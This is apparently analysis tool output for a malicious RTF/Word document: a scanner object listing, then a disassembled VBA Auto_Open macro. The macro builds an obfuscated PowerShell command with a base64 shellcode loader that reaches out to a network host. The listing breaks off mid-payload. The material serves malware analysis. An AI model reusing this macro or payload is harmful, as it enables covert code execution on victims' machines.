-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX5.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX6.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX7.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX8.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX9.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX1.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX10.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX11.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX12.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX13.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX14.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX15.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX16.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX17.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX18.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX19.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX2.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX20.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX21.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX22.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX23.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX24.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX25.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX26.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX27.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX28.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX29.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX3.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX30.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX31.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX32.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX33.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX34.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX35.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX36.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX37.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX38.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX39.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX4.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX40.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX5.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX6.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX7.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX8.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX9.xml.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",12878,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",1261,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
-ScanObject("ARCHIVE_FS" (0:"UNKNOWN",222,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/media/image1.wmf")
-ScanObject("ARCHIVE_FS" (5:"XML",2519,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",28676,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",6795,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",497,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",6537,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
-CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
-ScanObject("ARCHIVE_FS" (5:"XML",590,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
-ScanObject("OLE2_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
-ScanObject("GENERIC_FS" (21:"TEXT",32,"d9fac68b6c49c485675d9141f375799d10572999|objclass_2")
-ScanObject("GENERIC_FS" (0:"UNKNOWN",45,"d9fac68b6c49c485675d9141f375799d10572999|objdata_3")
-ScanObject("GENERIC_FS" (21:"TEXT",38,"d9fac68b6c49c485675d9141f375799d10572999|oleclsid_4")
-ScanObject("GENERIC_FS" (32:"OLEOBJ",1592,"d9fac68b6c49c485675d9141f375799d10572999|datastore_5")
-ScanObject("MEM_FS" (1:"OLE2",1536,"d9fac68b6c49c485675d9141f375799d10572999|datastore_5|RTFOLEOBJECT|msxml2.saxxmlreader.5.0")
-ScanObject("GENERIC_FS" (21:"TEXT",2521,"d9fac68b6c49c485675d9141f375799d10572999|lsdlockedexcept_6")
-ScanObject("GENERIC_FS" (31:"HEX",628,"d9fac68b6c49c485675d9141f375799d10572999|colorschememapping_7")
-ScanObject("MEM_FS" (5:"XML",314,"d9fac68b6c49c485675d9141f375799d10572999|colorschememapping_7|HEX")
-ScanObject("GENERIC_FS" (31:"HEX",6162,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8")
-ScanObject("MEM_FS" (7:"ZIP",3081,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX")
-CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
-ScanObject("ARCHIVE_FS" (5:"XML",310,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|_rels/.rels")
-ScanObject("ARCHIVE_FS" (5:"XML",138,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/themeManager.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",6992,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/theme1.xml")
-ScanObject("ARCHIVE_FS" (5:"XML",283,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/_rels/themeManager.xml.rels")
-ScanObject("GENERIC_FS" (21:"TEXT",1060,"d9fac68b6c49c485675d9141f375799d10572999|dptxbxtext_9")
-ScanObject("GENERIC_FS" (21:"TEXT",1060,"d9fac68b6c49c485675d9141f375799d10572999|shptxt_10")
-ScanObject("GENERIC_FS" (31:"HEX",244,"d9fac68b6c49c485675d9141f375799d10572999|sv_11")
-ScanObject("MEM_FS" (0:"UNKNOWN",122,"d9fac68b6c49c485675d9141f375799d10572999|sv_11|HEX")
-ScanObject("GENERIC_FS" (27:"BASE64",570,"d9fac68b6c49c485675d9141f375799d10572999|sn_12")
-ScanObject("MEM_FS" (0:"UNKNOWN",426,"d9fac68b6c49c485675d9141f375799d10572999|sn_12|B64")
-ScanObject("GENERIC_FS" (21:"TEXT",5,"d9fac68b6c49c485675d9141f375799d10572999|pntxtb_13")
-ScanObject("GENERIC_FS" (21:"TEXT",9,"d9fac68b6c49c485675d9141f375799d10572999|pntxta_14")
-ScanObject("GENERIC_FS" (31:"HEX",4,"d9fac68b6c49c485675d9141f375799d10572999|wgrffmtfilter_15")
-ScanObject("MEM_FS" (21:"TEXT",2,"d9fac68b6c49c485675d9141f375799d10572999|wgrffmtfilter_15|HEX")
-ScanObject("GENERIC_FS" (21:"TEXT",52,"d9fac68b6c49c485675d9141f375799d10572999|xmlnstbl_16")
-ScanObject("GENERIC_FS" (27:"BASE64",12,"d9fac68b6c49c485675d9141f375799d10572999|operator_17")
-ScanObject("MEM_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|operator_17|B64")
-ScanObject("GENERIC_FS" (27:"BASE64",12,"d9fac68b6c49c485675d9141f375799d10572999|author_18")
-ScanObject("MEM_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|author_18|B64")
-ScanObject("GENERIC_FS" (21:"TEXT",43,"d9fac68b6c49c485675d9141f375799d10572999|stylesheet_19")
-ScanObject("GENERIC_FS" (21:"TEXT",17,"d9fac68b6c49c485675d9141f375799d10572999|colortbl_20")
-ScanObject("GENERIC_FS" (27:"BASE64",36,"d9fac68b6c49c485675d9141f375799d10572999|falt_21")
-ScanObject("MEM_FS" (0:"UNKNOWN",27,"d9fac68b6c49c485675d9141f375799d10572999|falt_21|B64")
-ScanObject("GENERIC_FS" (31:"HEX",280,"d9fac68b6c49c485675d9141f375799d10572999|panose_22")
-ScanObject("MEM_FS" (0:"UNKNOWN",140,"d9fac68b6c49c485675d9141f375799d10572999|panose_22|HEX")
-ScanObject("GENERIC_FS" (0:"UNKNOWN",1618,"d9fac68b6c49c485675d9141f375799d10572999|fonttbl_23")
-ScanObject("GENERIC_FS" (21:"TEXT",4167,"d9fac68b6c49c485675d9141f375799d10572999|rtf_24")
Full pcodedmp output of sample 3:
Macros/VBA/ThisDocument - 10363 bytes
Line #0:
FuncDefn (Sub Auto_Open())
Line #1:
Dim
VarDefn omVsI
Line #2:
LineCont 0x0028 19 00 00 00 1B 00 00 00 1D 00 00 00 1F 00 00 00 21 00 00 00 23 00 00 00 25 00 00 00 27 00 00 00 29 00 00 00 2B 00 00 00
LitStr 0x0063 " /w 1 /C "s''v Td -;s''v QYI e''c;s''v HI ((g''v Td).value.toString()+(g''v QYI).value.toString());"
LitStr 0x0001 "p"
Concat
LitStr 0x0001 "o"
Concat
LitStr 0x0001 "w"
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 "r"
Concat
LitStr 0x0001 "s"
Concat
LitStr 0x0001 "h"
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 "l"
Concat
LitStr 0x0001 "l"
Concat
LitStr 0x02A9 " (g''v HI).value.toString() ('JABmAE4AIAA9ACAAJwAkAEIAQgBmACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB"
Concat
LitStr 0x0320 "0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVABJACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBCAGYAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQB"
Concat
LitStr 0x0320 "dADsAWwBCAHkAdABlAFsAXQBdACQARwB0ACAAPQAgADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAA"
Concat
LitStr 0x0320 "sADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQA"
Concat
LitStr 0x0320 "sADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADYAOQAsADAAeAA2AGUALAAwAHgANgA5ACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMwAxACwAMAB4AGQAYgAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeABhADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAYgBiACwAMAB4ADAAMQA"
Concat
LitStr 0x0320 "sADAAeAAwADAALAAwAHgAMAAwACwAMAB4AGUAOAAsADAAeABiADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgBmACwAMAB4ADQAYQAsADAAeAA2ADEALAAwAHgANQA4ACwAMAB4ADQAZgAsADAAeAA1ADUALAAwAHgAMwAzACwAMAB4ADUANQAsADAAeAAzADYALAAwAHgANQA3ACwAMAB4ADYANgAsADAAeAA1ADMALAAwAHgANgA0ACwAMAB4ADQAOQAsADAAeAA0AGEALAAwAHgANwA3ACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA2ACwAMAB4ADUANAAsADAAeAA2AGQALAAwAHgAMwAwACwAMAB4ADYANwAsADAAeAAzADcALAAwAHgANwAzACwAMAB4ADQANQAsADAAeAAzADMALAAwAHgANAAxACwAMAB4ADQAMQAsADAAeAAzADgALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAzADIALAAwAHgAZQAwACwAMAB4ADgANAAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1'+'ADcALAAwAHgANQAzACwAMAB4ADUA"
Concat
LitStr 0x0320 "NgAsADAAeAA2ADgALAAwAHgAZQBiACwAMAB4ADUANQAsADAAeAAyAGUALAAwAHgAMwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA2ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANQBmACwAMAB4ADYAOAAsADAAeAA4ADAALAAwAHgAMwAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAOAA5ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgAMQBmACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4ADQANgAsADAAeAA5AGUALAAwAHgAOAA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMgBkACwAMAB4ADAANgAsADAAeAAxADgALAAwAHgANwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAMQA2ACwAMAB4ADYAOAAsADAAeAA4ADgALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADQANAAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQA"
Concat
LitStr 0x0320 "ZgAsADAAeAA3ADUALAAwAHgAYwBkACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADgAOQAsADAAeABlADcALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMQAyACwAMAB4ADkANgAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAAwADcALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcA"
Concat
LitStr 0x0320 "NQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADYAOQAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMAAsADAAeAAyAGUALAAwAHgAMwA1ACwAMAB4ADAAMAA7ACQAUABkACAAPQAgADAAeAAxADAAMAAyADsAaQBmACAAKAAkAEcAdAAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMgApAHsAJABQAGQAIAA9ACAAJABHAHQALgBMAGUAbgBnAHQAaAB9ADsAJABFAGMAPQAkAFQASQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADIALAAkAFAAZAAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEIAQgA9ADAAOwAkAEIAQgAgAC0AbABlACAAKAAkAEcAdAAuAEwAZQBuAGcAdABoAC0AMQApADsAJABCAEIAKwArACkAIAB7ACQAVABJADoAOgBtAGUAbQBzAGUAdAAoAFsASQBu